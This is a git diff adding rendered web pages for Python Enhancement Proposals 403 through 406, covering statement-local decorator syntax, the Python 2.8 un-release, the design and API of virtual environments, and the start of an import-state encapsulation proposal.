+>>> f()
+<function f.<locals>.<lambda> at 0x7f6f46faeae0>
+
+
+

Anonymous functions (or functions that share a name) within the same scope +will still share representations (aside from the object ID), but this is +still a major improvement over the historical situation where everything +except the object ID was identical.

+
+
+

Possible Implementation Strategy

+

This proposal has at least one titanic advantage over PEP 3150: +implementation should be relatively straightforward.

+

The @in clause will be included in the AST for the associated function or +class definition and the statement that references it. When the @in +clause is present, it will be emitted in place of the local name binding +operation normally implied by a function or class definition.

+

The one potentially tricky part is changing the meaning of the references to +the statement local function or namespace while within the scope of the +in statement, but that shouldn’t be too hard to address by maintaining +some additional state within the compiler (it’s much easier to handle this +for a single name than it is for an unknown number of names in a full +nested suite).

+
+
+

Explaining Container Comprehensions and Generator Expressions

+

One interesting feature of the proposed construct is that it can be used as +a primitive to explain the scoping and execution order semantics of +both generator expressions and container comprehensions:

+
seq2 = [x for y in seq if p(y) for x in y if q(x)]
+
+# would be equivalent to
+
+@in seq2 = f(seq)
+def f(seq):
+    result = []
+    for y in seq:
+        if p(y):
+            for x in y:
+                if q(x):
+                    result.append(x)
+    return result
+
+
+

The important point in this expansion is that it explains why comprehensions +appear to misbehave at class scope: only the outermost iterator is evaluated +at class scope, while all predicates, nested iterators and value expressions +are evaluated inside a nested scope.

+

An equivalent expansion is possible for generator expressions:

+
gen = (x for y in seq if p(y) for x in y if q(x))
+
+# would be equivalent to
+
+@in gen = g(seq)
+def g(seq):
+    for y in seq:
+        if p(y):
+            for x in y:
+                if q(x):
+                    yield x
+
+
+
+
+
+

More Examples

+

Calculating attributes without polluting the local namespace (from os.py):

+
# Current Python (manual namespace cleanup)
+def _createenviron():
+    ... # 27 line function
+
+environ = _createenviron()
+del _createenviron
+
+# Becomes:
+@in environ = _createenviron()
+def _createenviron():
+    ... # 27 line function
+
+
+

Loop early binding:

+
# Current Python (default argument hack)
+funcs = [(lambda x, i=i: x + i) for i in range(10)]
+
+# Becomes:
+@in funcs = [adder(i) for i in range(10)]
+def adder(i):
+    return lambda x: x + i
+
+# Or even:
+@in funcs = [adder(i) for i in range(10)]
+def adder(i):
+    @in return incr
+    def incr(x):
+        return x + i
+
+
+

A trailing class can be used as a statement local namespace:

+
# Evaluate subexpressions only once
+@in c = math.sqrt(x.a*x.a + x.b*x.b)
+class x:
+    a = calculate_a()
+    b = calculate_b()
+
+
+

A function can be bound directly to a location which isn’t a valid +identifier:

+
@in dispatch[MyClass] = f
+def f():
+    ...
+
+
+

Constructs that verge on decorator abuse can be eliminated:

+
# Current Python
+@call
+def f():
+    ...
+
+# Becomes:
+@in f()
+def f():
+    ...
+
+
+
+
+

Reference Implementation

+

None as yet.

+
+
+

Acknowledgements

+

Huge thanks to Gary Bernhardt for being blunt in pointing out that I had no +idea what I was talking about in criticising Ruby’s blocks, kicking off a +rather enlightening process of investigation.

+
+
+

Rejected Concepts

+

To avoid retreading previously covered ground, some rejected alternatives +are documented in this section.

+
+

Omitting the decorator prefix character

+

Earlier versions of this proposal omitted the @ prefix. However, without +that prefix, the bare in keyword didn’t associate the clause strongly +enough with the subsequent function or class definition. Reusing the +decorator prefix and explicitly characterising the new construct as a kind +of decorator clause is intended to help users link the two concepts and +see them as two variants of the same idea.

+
+
+

Anonymous Forward References

+

A previous incarnation of this PEP (see [1]) proposed a syntax where the +new clause was introduced with : and the forward reference was written +using @. Feedback on this variant was almost universally +negative, as it was considered both ugly and excessively magical:

+
:x = weakref.ref(target, @)
+def report_destruction(obj):
+    print("{} is being destroyed".format(obj))
+
+
+

A more recent variant always used ... for forward references, along +with genuinely anonymous function and class definitions. However, this +degenerated quickly into a mass of unintelligible dots in more complex +cases:

+
in funcs = [...(i) for i in range(10)]
+def ...(i):
+  in return ...
+  def ...(x):
+      return x + i
+
+in c = math.sqrt(....a*....a + ....b*....b)
+class ...:
+  a = calculate_a()
+  b = calculate_b()
+
+
+
+
+

Using a nested suite

+

The problems with using a full nested suite are best described in +PEP 3150. It’s comparatively difficult to implement properly, the scoping +semantics are harder to explain and it creates quite a few situations where +there are two ways to do it without clear guidelines for choosing between +them (as almost any construct that can be expressed with ordinary imperative +code could instead be expressed using a given statement). While the PEP does +propose some new PEP 8 guidelines to help address that last problem, the +difficulties in implementation are not so easily dealt with.

+

By contrast, the decorator inspired syntax in this PEP explicitly limits the +new feature to cases where it should actually improve readability, rather +than harming it. As in the case of the original introduction of decorators, +the idea of this new syntax is that if it can be used (i.e. the local name +binding of the function is completely unnecessary) then it probably should +be used.

+

Another possible variant of this idea is to keep the decorator based +semantics of this PEP, while adopting the prettier syntax from PEP 3150:

+
x = weakref.ref(target, report_destruction) given:
+    def report_destruction(obj):
+        print("{} is being destroyed".format(obj))
+
+
+

There are a couple of problems with this approach. The main issue is that +this syntax variant uses something that looks like a suite, but really isn’t +one. A secondary concern is that it’s not clear how the compiler will know +which name(s) in the leading expression are forward references (although +that could potentially be addressed through a suitable definition of the +suite-that-is-not-a-suite in the language grammar).

+

However, a nested suite has not yet been ruled out completely. The latest +version of PEP 3150 uses explicit forward reference and name binding +schemes that greatly simplify the semantics of the statement, and it +does offer the advantage of allowing the definition of arbitrary +subexpressions rather than being restricted to a single function or +class definition.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0403.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0404/index.html b/pep-0404/index.html new file mode 100644 index 00000000000..1114a154487 --- /dev/null +++ b/pep-0404/index.html @@ -0,0 +1,296 @@ + + + + + + + + PEP 404 – Python 2.8 Un-release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 404 – Python 2.8 Un-release Schedule

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
09-Nov-2011
+
Python-Version:
+
2.8
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the un-development and un-release schedule for Python +2.8.

+
+
+

Un-release Manager and Crew

+ + + + + + + + + + + +
Position                  Name
2.8 Un-release Manager    Cardinal Biggles
+
+
+

Un-release Schedule

+

The current un-schedule is:

+
    +
  • 2.8 final: Never
  • +
+
+
+

Official pronouncement

+

Rule number six: there is no official Python 2.8 release. There never will +be an official Python 2.8 release. It is an ex-release. Python 2.7 +is the end of the Python 2 line of development.

+
+
+

Upgrade path

+

The official upgrade path from Python 2.7 is to Python 3.

+
+
+

And Now For Something Completely Different

+

In all seriousness, there are important reasons why there won’t be an +official Python 2.8 release, and why you should plan to migrate +instead to Python 3.

+

Python is (as of this writing) more than 20 years old, and Guido and the +community have learned a lot in those intervening years. Guido’s +original concept for Python 3 was to make changes to the language +primarily to remove the warts that had grown in the preceding +versions. Python 3 was not to be a complete redesign, but instead an +evolution of the language, and while maintaining full backward +compatibility with Python 2 was explicitly off-the-table, neither were +gratuitous changes in syntax or semantics acceptable. In most cases, +Python 2 code can be translated fairly easily to Python 3, sometimes +entirely mechanically by such tools as 2to3 (there’s also a non-trivial +subset of the language that will run without modification on both 2.7 and +3.x).

+

Because maintaining multiple versions of Python is a significant drag +on the resources of the Python developers, and because the +improvements to the language and libraries embodied in Python 3 are so +important, it was decided to end the Python 2 lineage with Python +2.7. Thus, all new development occurs in the Python 3 line of +development, and there will never be an official Python 2.8 release. +Python 2.7 will however be maintained for longer than the usual period +of time.

+

Here are some highlights of the significant improvements in Python 3. +You can read in more detail on the differences between Python 2 and +Python 3. There are also many good guides on porting from Python 2 +to Python 3.

+
+

Strings and bytes

+

Python 2’s basic original strings are called 8-bit strings, and +they play a dual role in Python 2 as both ASCII text and as byte +sequences. While Python 2 also has a unicode string type, the +fundamental ambiguity of the core string type, coupled with Python 2’s +default behavior of supporting automatic coercion from 8-bit strings +to unicode objects when the two are combined, often leads to +UnicodeErrors. Python 3’s standard string type is Unicode based, and +Python 3 adds a dedicated bytes type, but critically, no automatic coercion +between bytes and unicode strings is provided. The closest the language gets +to implicit coercion are a few text-based APIs that assume a default +encoding (usually UTF-8) if no encoding is explicitly stated. Thus, the core +interpreter, its I/O libraries, module names, etc. are clear in their +distinction between unicode strings and bytes. Python 3’s unicode +support even extends to the filesystem, so that non-ASCII file names are +natively supported.
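
For example (illustrative transcripts):

+
# Python 2: implicit coercion to unicode (and, for non-ASCII data,
+# a runtime UnicodeDecodeError):
+>>> 'abc' + u'def'
+u'abcdef'
+
+# Python 3: bytes and str never mix implicitly:
+>>> b'abc' + 'def'
+Traceback (most recent call last):
+  ...
+TypeError: can't concat str to bytes
+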

+

This string/bytes clarity is often a source of difficulty in +transitioning existing code to Python 3, because many third party +libraries and applications are themselves ambiguous in this +distinction. Once migrated though, most UnicodeErrors can be +eliminated.

+
+
+

Numbers

+

Python 2 has two basic integer types, a native machine-sized int +type, and an arbitrary length long type. These have been merged in +Python 3 into a single int type analogous to Python 2’s long +type.

+

In addition, dividing one integer by another with the / operator now performs true division and returns a float, even when the result is integral; the // operator is available for floor division.
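
For example:

+
>>> 17 / 5      # true division in Python 3
+3.4
+>>> 4 / 2       # a float even when the result is integral
+2.0
+>>> 17 // 5     # floor division
+3
+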

+
+
+

Classes

+

Python 2 has two core class hierarchies, often called classic classes and new-style classes. The latter allow for such things as inheriting from the builtin basic types, support descriptor-based tools like the property builtin, and provide a generally more sane and coherent system for dealing with multiple inheritance. Python 3 provided the opportunity to completely drop support for classic classes, so all classes in Python 3 automatically use the new-style semantics (although that’s a misnomer now). There is no need to explicitly inherit from object or set the default metatype to enable them (in fact, setting a default metatype at the module level is no longer supported - the default metatype is always object).

+

The mechanism for explicitly specifying a metaclass has also changed to use +a metaclass keyword argument in the class header line rather than a +__metaclass__ magic attribute in the class body.
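
For example, assuming a metaclass Meta has been defined:

+
class Meta(type):           # an example metaclass
+    pass
+
+# Python 2 spelling (no longer supported):
+#     class C(object):
+#         __metaclass__ = Meta
+
+# Python 3 spelling:
+class C(metaclass=Meta):
+    pass
+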

+
+
+

Multiple spellings

+

There are many cases in Python 2 where multiple spellings of some +constructs exist, such as repr() and backticks, or the two +inequality operators != and <>. In all cases, Python 3 has chosen +exactly one spelling and removed the other (e.g. repr() and != +were kept).
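
For example:

+
x, y = 1, 2
+repr(x)     # kept; the `x` backtick form was removed
+x != y      # kept; the x <> y form was removed
+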

+
+
+

Imports

+

In Python 3, implicit relative imports within packages are no longer +available - only absolute imports and explicit relative imports are +supported. In addition, star imports (e.g. from x import *) are only +permitted in module level code.
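
For example, for a module inside a hypothetical package mypackage that wants to import a sibling module:

+
# Python 2 (implicit relative import; invalid in Python 3):
+#     import sibling
+
+# Python 3: explicit relative import...
+from . import sibling
+# ...or an absolute import:
+import mypackage.sibling
+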

+

Also, some areas of the standard library have been reorganized to make +the naming scheme more intuitive. Some rarely used builtins have been +relocated to standard library modules.

+
+
+

Iterators and views

+

Many APIs that returned concrete lists in Python 2 now return iterators or lightweight views in Python 3.
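
For example:

+
>>> d = {'a': 1}
+>>> d.keys()                 # a list in Python 2, a view in Python 3
+dict_keys(['a'])
+>>> m = map(str, [1, 2])     # a list in Python 2, an iterator in Python 3
+>>> list(m)
+['1', '2']
+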

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0404.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0405/index.html b/pep-0405/index.html new file mode 100644 index 00000000000..5f7f737ffd8 --- /dev/null +++ b/pep-0405/index.html @@ -0,0 +1,595 @@ + + + + + + + + PEP 405 – Python Virtual Environments | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 405 – Python Virtual Environments

+
+
Author:
+
Carl Meyer <carl at oddbird.net>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
13-Jun-2011
+
Python-Version:
+
3.3
+
Post-History:
+
24-Oct-2011, 28-Oct-2011, 06-Mar-2012, 24-May-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add to Python a mechanism for lightweight +“virtual environments” with their own site directories, optionally +isolated from system site directories. Each virtual environment has +its own Python binary (allowing creation of environments with various +Python versions) and can have its own independent set of installed +Python packages in its site directories, but shares the standard +library with the base installed Python.

+
+
+

Motivation

+

The utility of Python virtual environments has already been well +established by the popularity of existing third-party +virtual-environment tools, primarily Ian Bicking’s virtualenv. +Virtual environments are already widely used for dependency management +and isolation, ease of installing and using Python packages without +system-administrator access, and automated testing of Python software +across multiple Python versions, among other uses.

+

Existing virtual environment tools suffer from lack of support from +the behavior of Python itself. Tools such as rvirtualenv, which do +not copy the Python binary into the virtual environment, cannot +provide reliable isolation from system site directories. Virtualenv, +which does copy the Python binary, is forced to duplicate much of +Python’s site module and manually symlink/copy an ever-changing +set of standard-library modules into the virtual environment in order +to perform a delicate boot-strapping dance at every startup. +(Virtualenv must copy the binary in order to provide isolation, as +Python dereferences a symlinked executable before searching for +sys.prefix.)

+

The PYTHONHOME environment variable, Python’s only existing +built-in solution for virtual environments, requires +copying/symlinking the entire standard library into every environment. +Copying the whole standard library is not a lightweight solution, and +cross-platform support for symlinks remains inconsistent (even on +Windows platforms that do support them, creating them often requires +administrator privileges).

+

A virtual environment mechanism integrated with Python and drawing on +years of experience with existing third-party tools can lower +maintenance, raise reliability, and be more easily available to all +Python users.

+
+
+

Specification

+

When the Python binary is executed, it attempts to determine its +prefix (which it stores in sys.prefix), which is then used to find +the standard library and other key files, and by the site module +to determine the location of the site-package directories. Currently +the prefix is found (assuming PYTHONHOME is not set) by first +walking up the filesystem tree looking for a marker file (os.py) +that signifies the presence of the standard library, and if none is +found, falling back to the build-time prefix hardcoded in the binary.

+

This PEP proposes to add a new first step to this search. If a +pyvenv.cfg file is found either adjacent to the Python executable or +one directory above it (if the executable is a symlink, it is not +dereferenced), this file is scanned for lines of the form key = +value. If a home key is found, this signifies that the Python +binary belongs to a virtual environment, and the value of the home +key is the directory containing the Python executable used to create +this virtual environment.

+

In this case, prefix-finding continues as normal using the value of +the home key as the effective Python binary location, which finds +the prefix of the base installation. sys.base_prefix is set to +this value, while sys.prefix is set to the directory containing +pyvenv.cfg.

+

(If pyvenv.cfg is not found or does not contain the home key, +prefix-finding continues normally, and sys.prefix will be equal to +sys.base_prefix.)

+

Also, sys.base_exec_prefix is added, and handled similarly with +regard to sys.exec_prefix. (sys.exec_prefix is the equivalent of +sys.prefix, but for platform-specific files; by default it has the +same value as sys.prefix.)

+

The site and sysconfig standard-library modules are modified +such that the standard library and header files are found relative +to sys.base_prefix / sys.base_exec_prefix, while site-package +directories (“purelib” and “platlib”, in sysconfig terms) are still +found relative to sys.prefix / sys.exec_prefix.

+

Thus, a Python virtual environment in its simplest form would consist +of nothing more than a copy or symlink of the Python binary +accompanied by a pyvenv.cfg file and a site-packages directory.
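
For example, from within such an environment the two prefixes diverge (the paths shown are purely illustrative):

+
>>> import sys
+>>> sys.prefix               # the virtual environment
+'/home/user/venvs/demo'
+>>> sys.base_prefix          # the base installation
+'/usr'
+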

+
+

Isolation from system site-packages

+

By default, a virtual environment is entirely isolated from the +system-level site-packages directories.

+

If the pyvenv.cfg file also contains a key +include-system-site-packages with a value of true (not case +sensitive), the site module will also add the system site +directories to sys.path after the virtual environment site +directories. Thus system-installed packages will still be importable, +but a package of the same name installed in the virtual environment +will take precedence.
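
Putting the pieces together, a pyvenv.cfg for such a non-isolated environment might read (the home path is illustrative):

+
home = /usr/bin
+include-system-site-packages = true
+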

+

PEP 370 user-level site-packages are considered part of the system +site-packages for venv purposes: they are not available from an +isolated venv, but are available from an +include-system-site-packages = true venv.

+
+
+

Creating virtual environments

+

This PEP also proposes adding a new venv module to the standard +library which implements the creation of virtual environments. This +module can be executed using the -m flag:

+
python3 -m venv /path/to/new/virtual/environment
+
+
+

A pyvenv installed script is also provided to make this more +convenient:

+
pyvenv /path/to/new/virtual/environment
+
+
+

Running this command creates the target directory (creating any parent +directories that don’t exist already) and places a pyvenv.cfg file +in it with a home key pointing to the Python installation the +command was run from. It also creates a bin/ (or Scripts on +Windows) subdirectory containing a copy (or symlink) of the python3 +executable, and the pysetup3 script from the packaging standard +library module (to facilitate easy installation of packages from PyPI +into the new venv). And it creates an (initially empty) +lib/pythonX.Y/site-packages (or Lib\site-packages on Windows) +subdirectory.

+

If the target directory already exists an error will be raised, unless +the --clear option was provided, in which case the target +directory will be deleted and virtual environment creation will +proceed as usual.

+

The created pyvenv.cfg file also includes the +include-system-site-packages key, set to true if pyvenv is +run with the --system-site-packages option, false by default.

+

Multiple paths can be given to pyvenv, in which case an identical +venv will be created, according to the given options, at each +provided path.

+

The venv module also places “shell activation scripts” for POSIX and +Windows systems in the bin or Scripts directory of the +venv. These scripts simply add the virtual environment’s bin (or +Scripts) directory to the front of the user’s shell PATH. This is +not strictly necessary for use of a virtual environment (as an explicit +path to the venv’s python binary or scripts can just as well be used), +but it is convenient.

+

In order to allow pysetup and other Python package managers to +install packages into the virtual environment the same way they would +install into a normal Python installation, and avoid special-casing +virtual environments in sysconfig beyond using sys.base_prefix +in place of sys.prefix where appropriate, the internal virtual +environment layout mimics the layout of the Python installation itself +on each platform. So a typical virtual environment layout on a POSIX +system would be:

+
pyvenv.cfg
+bin/python3
+bin/python
+bin/pysetup3
+include/
+lib/python3.3/site-packages/
+
+
+

While on a Windows system:

+
pyvenv.cfg
+Scripts/python.exe
+Scripts/python3.dll
+Scripts/pysetup3.exe
+Scripts/pysetup3-script.py
+        ... other DLLs and pyds...
+Include/
+Lib/site-packages/
+
+
+

Third-party packages installed into the virtual environment will have +their Python modules placed in the site-packages directory, and +their executables placed in bin/ or Scripts.

+
+

Note

+

On a normal Windows system-level installation, the Python binary +itself wouldn’t go inside the “Scripts/” subdirectory, as it does +in the default venv layout. This is useful in a virtual +environment so that a user only has to add a single directory to +their shell PATH in order to effectively “activate” the virtual +environment.

+
+
+

Note

+

On Windows, it is necessary to also copy or symlink DLLs and pyd +files from compiled stdlib modules into the env, because if the +venv is created from a non-system-wide Python installation, +Windows won’t be able to find the Python installation’s copies of +those files when Python is run from the venv.

+
+
+
+

Sysconfig install schemes and user-site

+

This approach explicitly chooses not to introduce a new sysconfig +install scheme for venvs. Rather, by modifying sys.prefix we +ensure that existing install schemes which base locations on +sys.prefix will simply work in a venv. Installation to other +install schemes (for instance, the user-site schemes) whose paths are +not relative to sys.prefix, will not be affected by a venv at all.

+

It may be feasible to create an alternative implementation of Python +virtual environments based on a virtual-specific sysconfig scheme, but +it would be less robust, as it would require more code to be aware of +whether it is operating within a virtual environment or not.

+
+ +
+

Include files

+

Current virtualenv handles include files in this way:

+

On POSIX systems where the installed Python’s include files are found in +${base_prefix}/include/pythonX.X, virtualenv creates +${venv}/include/ and symlinks ${base_prefix}/include/pythonX.X +to ${venv}/include/pythonX.X. On Windows, where Python’s include +files are found in {{ sys.prefix }}/Include and symlinks are not +reliably available, virtualenv copies {{ sys.prefix }}/Include to +${venv}/Include. This ensures that extension modules built and +installed within the virtualenv will always find the Python header files +they need in the expected location relative to sys.prefix.

+

This solution is not ideal when an extension module installs its own +header files, as the default installation location for those header +files may be a symlink to a system directory that may not be +writable. One installer, pip, explicitly works around this by +installing header files to a nonstandard location +${venv}/include/site/pythonX.X/, as in Python there’s currently no +standard abstraction for a site-specific include directory.

+

This PEP proposes a slightly different approach, though one with +essentially the same effect and the same set of advantages and +disadvantages. Rather than symlinking or copying include files into the +venv, we simply modify the sysconfig schemes so that header files are +always sought relative to base_prefix rather than prefix. (We +also create an include/ directory within the venv, so installers +have somewhere to put include files installed within the env).

+

Better handling of include files in distutils/packaging and, by extension, pyvenv, is an area that may deserve its own future PEP. For now, we note that the behavior of virtualenv has thus far proved itself to be at least “good enough” in practice.

+
+
+

API

+

The high-level method described above makes use of a simple API which +provides mechanisms for third-party virtual environment creators to +customize environment creation according to their needs.

+

The venv module contains an EnvBuilder class which accepts the +following keyword arguments on instantiation:

+
    +
  • system_site_packages - A Boolean value indicating that the +system Python site-packages should be available to the environment. +Defaults to False.
  • +
  • clear - A Boolean value which, if true, will delete any existing +target directory instead of raising an exception. Defaults to +False.
  • +
  • symlinks - A Boolean value indicating whether to attempt to +symlink the Python binary (and any necessary DLLs or other binaries, +e.g. pythonw.exe), rather than copying. Defaults to False.
  • +
+

The instantiated env-builder has a create method, which takes as +required argument the path (absolute or relative to the current +directory) of the target directory which is to contain the virtual +environment. The create method either creates the environment in +the specified directory, or raises an appropriate exception.

+

The venv module also provides a module-level create function +as a convenience:

+
def create(env_dir,
+           system_site_packages=False, clear=False, symlinks=False):
+    builder = EnvBuilder(
+        system_site_packages=system_site_packages,
+        clear=clear,
+        symlinks=symlinks)
+    builder.create(env_dir)
+
+
+

Creators of third-party virtual environment tools are free to use the +provided EnvBuilder class as a base class.

+

The create method of the EnvBuilder class illustrates the +hooks available for customization:

+
def create(self, env_dir):
+    """
+    Create a virtualized Python environment in a directory.
+
+    :param env_dir: The target directory to create an environment in.
+
+    """
+    env_dir = os.path.abspath(env_dir)
+    context = self.create_directories(env_dir)
+    self.create_configuration(context)
+    self.setup_python(context)
+    self.post_setup(context)
+
+
+

Each of the methods create_directories, create_configuration, +setup_python, and post_setup can be overridden. The functions +of these methods are:

+
    +
  • create_directories - creates the environment directory and all +necessary directories, and returns a context object. This is just a +holder for attributes (such as paths), for use by the other methods.
  • +
  • create_configuration - creates the pyvenv.cfg configuration +file in the environment.
  • +
  • setup_python - creates a copy of the Python executable (and, +under Windows, DLLs) in the environment.
  • +
  • post_setup - A (no-op by default) hook method which can be +overridden in third party subclasses to pre-install packages or +install scripts in the virtual environment.
  • +
+

In addition, EnvBuilder provides a utility method that can be +called from post_setup in subclasses to assist in installing +custom scripts into the virtual environment. The method +install_scripts accepts as arguments the context object (see +above) and a path to a directory. The directory should contain +subdirectories “common”, “posix”, “nt”, each containing scripts +destined for the bin directory in the environment. The contents of +“common” and the directory corresponding to os.name are copied +after doing some text replacement of placeholders:

+
    +
  • __VENV_DIR__ is replaced with absolute path of the environment +directory.
  • +
  • __VENV_NAME__ is replaced with the environment name (final path +segment of environment directory).
  • +
  • __VENV_BIN_NAME__ is replaced with the name of the bin directory +(either bin or Scripts).
  • +
  • __VENV_PYTHON__ is replaced with the absolute path of the +environment’s executable.
  • +
+

The DistributeEnvBuilder subclass in the reference implementation +illustrates how the customization hook can be used in practice to +pre-install Distribute into the virtual environment. It’s not +envisaged that DistributeEnvBuilder will be actually added to +Python core, but it makes the reference implementation more +immediately useful for testing and exploratory purposes.
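
As an illustration, a third-party tool might customise creation roughly as follows (a sketch against the proposed API; the script directory path is an assumption, and must contain the “common”, “posix” and “nt” subdirectories described above):

+
import venv   # the module proposed by this PEP
+
+class PluginEnvBuilder(venv.EnvBuilder):
+    """Hypothetical subclass that pre-installs launcher scripts."""
+
+    def post_setup(self, context):
+        # '/path/to/scripts' is an assumed directory laid out per
+        # the install_scripts() convention described above.
+        self.install_scripts(context, '/path/to/scripts')
+
+builder = PluginEnvBuilder(system_site_packages=False, clear=True)
+builder.create('/path/to/new/venv')
+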

+
+
+
+

Backwards Compatibility

+
+

Splitting the meanings of sys.prefix

+

Any virtual environment tool along these lines (which attempts to +isolate site-packages, while still making use of the base Python’s +standard library with no need for it to be symlinked into the virtual +environment) is proposing a split between two different meanings +(among others) that are currently both wrapped up in sys.prefix: +the answers to the questions “Where is the standard library?” and +“Where is the site-packages location where third-party modules should +be installed?”

+

This split could be handled by introducing a new sys attribute for +either the former prefix or the latter prefix. Either option +potentially introduces some backwards-incompatibility with software +written to assume the other meaning for sys.prefix. (Such +software should preferably be using the APIs in the site and +sysconfig modules to answer these questions rather than using +sys.prefix directly, in which case there is no +backwards-compatibility issue, but in practice sys.prefix is +sometimes used.)

+

The documentation for sys.prefix describes it as “A string +giving the site-specific directory prefix where the platform +independent Python files are installed,” and specifically mentions the +standard library and header files as found under sys.prefix. It +does not mention site-packages.

+

Maintaining this documented definition would mean leaving +sys.prefix pointing to the base system installation (which is +where the standard library and header files are found), and +introducing a new value in sys (something like +sys.site_prefix) to point to the prefix for site-packages. +This would maintain the documented semantics of sys.prefix, but +risk breaking isolation if third-party code uses sys.prefix rather +than sys.site_prefix or the appropriate site API to find +site-packages directories.

+

The most notable case is probably setuptools and its fork +distribute, which mostly use distutils and sysconfig APIs, +but do use sys.prefix directly to build up a list of site +directories for pre-flight checking where pth files can usefully be +placed.

+

Otherwise, a Google Code Search turns up what appears to be a +roughly even mix of usage between packages using sys.prefix to +build up a site-packages path and packages using it to e.g. eliminate +the standard-library from code-execution tracing.

+

Although it requires modifying the documented definition of +sys.prefix, this PEP prefers to have sys.prefix point to the +virtual environment (where site-packages is found), and introduce +sys.base_prefix to point to the standard library and Python header +files. Rationale for this choice:

+
    +
  • It is preferable to err on the side of greater isolation of the +virtual environment.
  • +
  • Virtualenv already modifies sys.prefix to point at the virtual +environment, and in practice this has not been a problem.
  • +
  • No modification is required to setuptools/distribute.
  • +
+
+
+

Impact on other Python implementations

+

The majority of this PEP’s changes occur in the standard library, which is +shared by other Python implementations and should not present any +problem.

+

Other Python implementations will need to replicate the new +sys.prefix-finding behavior of the interpreter bootstrap, including +locating and parsing the pyvenv.cfg file, if it is present.

+
+
+
+

Reference Implementation

+

The reference implementation is found in a clone of the CPython +Mercurial repository. To test it, build and run bin/pyvenv +/path/to/new/venv to create a virtual environment.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0405.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0406/index.html b/pep-0406/index.html new file mode 100644 index 00000000000..5b7d3ed3554 --- /dev/null +++ b/pep-0406/index.html @@ -0,0 +1,375 @@ + + + + + + + + PEP 406 – Improved Encapsulation of Import State | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 406 – Improved Encapsulation of Import State

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, Greg Slodkowicz <jergosh at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
04-Jul-2011
+
Python-Version:
+
3.4
+
Post-History:
+
31-Jul-2011, 13-Nov-2011, 04-Dec-2011
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the introduction of a new ‘ImportEngine’ class as part of +importlib which would encapsulate all state related to importing modules +into a single object. Creating new instances of this object would then provide +an alternative to completely replacing the built-in implementation of the +import statement, by overriding the __import__() function. To work with +the builtin import functionality and importing via import engine objects, +this PEP proposes a context management based approach to temporarily replacing +the global import state.

+

The PEP also proposes inclusion of a GlobalImportEngine subclass and a +globally accessible instance of that class, which “writes through” to the +process global state. This provides a backwards compatible bridge between the +proposed encapsulated API and the legacy process global state, and allows +straightforward support for related state updates (e.g. selectively +invalidating path cache entries when sys.path is modified).

+
+
+

PEP Withdrawal

+

The import system has seen substantial changes since this PEP was originally +written, as part of PEP 420 in Python 3.3 and PEP 451 in Python 3.4.

+

While providing an encapsulation of the import state is still highly +desirable, it is better tackled in a new PEP using PEP 451 as a foundation, +and permitting only the use of PEP 451 compatible finders and loaders (as +those avoid many of the issues of direct manipulation of global state +associated with the previous loader API).

+
+
+

Rationale

+

Currently, most state related to the import system is stored as module level +attributes in the sys module. The one exception is the import lock, which +is not accessible directly, but only via the related functions in the imp +module. The current process global import state comprises:

+
    +
  • sys.modules
  • +
  • sys.path
  • +
  • sys.path_hooks
  • +
  • sys.meta_path
  • +
  • sys.path_importer_cache
  • +
  • the import lock (imp.lock_held()/acquire_lock()/release_lock())
  • +
+

Isolating this state would allow multiple import states to be +conveniently stored within a process. Placing the import functionality +in a self-contained object would also allow subclassing to add additional +features (e.g. module import notifications or fine-grained control +over which modules can be imported). The engine would also be +subclassed to make it possible to use the import engine API to +interact with the existing process-global state.

+

The namespace PEPs (especially PEP 402) raise a potential need for +additional process global state, in order to correctly update package paths +as sys.path is modified.

+

Finally, providing a coherent object for all this state makes it feasible to +also provide context management features that allow the import state to be +temporarily substituted.

+
+
+

Proposal

+

We propose introducing an ImportEngine class to encapsulate import +functionality. This includes an __import__() method which can +be used as an alternative to the built-in __import__() when +desired and also an import_module() method, equivalent to +importlib.import_module() [3].

+

Since there are global import state invariants that are assumed and should be maintained, we introduce a GlobalImportEngine class with an interface identical to ImportEngine but directly accessing the current global import state. This can be easily implemented using class properties.

+
+
+

Specification

+
+

ImportEngine API

+

The proposed extension consists of the following objects:

+

importlib.engine.ImportEngine

+
+
from_engine(self, other)
+
Create a new import engine from another ImportEngine instance. The new object is initialised with a copy of the state in other. When called on importlib.engine.sysengine, from_engine() can be used to create an ImportEngine object with a copy of the global import state.
+

__import__(self, name, globals={}, locals={}, fromlist=[], level=0)

+
+
Reimplementation of the builtin __import__() function. The +import of a module will proceed using the state stored in the +ImportEngine instance rather than the global import state. For full +documentation of __import__ functionality, see [2] . +__import__() from ImportEngine and its subclasses can be used +to customise the behaviour of the import statement by replacing +__builtin__.__import__ with ImportEngine().__import__.
+

import_module(name, package=None)

+
+
A reimplementation of importlib.import_module() which uses the +import state stored in the ImportEngine instance. See [3] for a full +reference.
+

modules, path, path_hooks, meta_path, path_importer_cache

+
+
